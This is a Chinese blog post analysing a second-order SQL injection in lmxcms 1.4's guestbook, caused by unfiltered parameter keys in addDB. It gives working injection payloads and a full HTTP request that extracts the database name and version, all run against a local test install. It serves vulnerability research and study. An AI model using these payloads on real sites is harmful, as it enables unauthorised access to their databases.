梦想cms二次注入漏洞分析

字数统计: 1.1k字   |   阅读时长≈ 4分

梦想cms二次注入漏洞分析

前言

看了社区一位师傅发的梦想cms的文章,在cnvd一搜发现洞还挺多的,在本地审计复现了一下,于是写了这篇文章。

二次注入简述

二次注入是SQL注入的一种。漏洞的发生主要分为两步,第一步是攻击者构造恶意SQL语句,这些语句会插入并存储在数据库中,第二步是将存储在数据库中的恶意SQL语句取出,直接调用,这样就造成了SQL的二次注入。

CMS框架

首先,了解一下cms的框架
index.php

先define定义两个常量,然后require包含文件。/inc/config.inc.php中是网站的配置文件,简单浏览一下后继续看/inc/run.inc.php文件。

69-73行中,通过Get方式传入参数m,控制调用的控制器,最后触发run()方法,跟进查看

Get方式传入参数a,如果参数a代表的方法存在,则调用该方法,否则调用index方法。

漏洞分析

大概了解了cms的框架,下面开始漏洞分析
漏洞出现在/index/BookAction.class.php文件,先访问看看

发现是留言版功能,那么可以猜想一下大概的流程,应该是可以通过留言插入sql语句到数据库中,然后下方显示留言的地方会调用数据库中的数据,从而造成二次注入。

下面来看具体代码
留言提交代码块

当setbook参数不为空,会调用checkData方法对参数进行检测,主要是调用p()函数防止sql注入,这里暂且不看,继续往下,进入add方法

跟进addModel()

最后跟踪到addDB方法

看到往数据库中插入的参数,$field和$value实际上就是传入的键值对的key和值

可以发现,键值对的值是使用单引号进行包裹,但是key直接传入,没做任何过滤
在cms的防止sql注入的过滤函数p()中,同样只对$v进行了过滤,忽略了$key

接下来留言看看插入的sql语句,在源码将sql语句输出,方便构造

可以看到sql语句是

INSERT INTO lmx_book(name,content,mail,tel,ip,time) VALUES('1','4','2','3','127.0.0.1','1640673423')

上面分析了键值对中的key没有过滤,那么可以尝试修改key构造注入语句

name=1&mail=2&tel=3&content=4&setbook=1&time)values('1','4','2','3','5','6')#=1

注入之后,回到页面发现并没有看到提交的留言,到mysql中看看

可以看到留言确实是插入到了数据库中,之所以没有显示,是因为有一个参数ischeck
在调用留言的代码中,可以看到只调用了’ischeck=1‘的留言

那么我们再在数据包中添加一个参数,修改ischeck值为1

再次回到留言版,可以看到留言,且name和content处有回显

于是修改数据包,查询database()及version()

POST /lmxcms1.4/index.php?m=Book&a=setBook HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/lmxcms1.4/?m=book
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
name=1&mail=2&tel=3&content=4&setbook=1&time,ischeck)values(database(),version(),'2','3','5','6','1')#=1

留言处成功回显数据库名及版本信息

写在后面

二次注入可以说是比较难发现的一种注入,不仅需要插入数据,还需要找到将插入数据提取出来使用的地方。即使找到注入的地方,如果不能看到回显也是没有用处了。本文分析的漏洞官方出了相应补丁,将留言设置为前台不显示,从而防止了二次注入的第二步。


谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

俗话说“好记性不如烂笔头”,各个安全社区各自为战,当我们想要搜索某一方面的文章的时候总是得在各个平台之间来回横跳,于是乎,一个平台文章聚合搜索的想法诞生了。
然后正好我想有一个自己的博客,于是乎两者融合在了一起。
下面简单介绍各个导航的区别:
个人文章:本人的笔记、复现、总结等或者本人参与的共同创作。
收集文章:手工从公众号收集保存的文章,更新频率看本人喜好所以比较慢。
聚合文章:从各大平台收集整理,由工具实现,每天更新。
很惭愧,只做了一点微小的工作。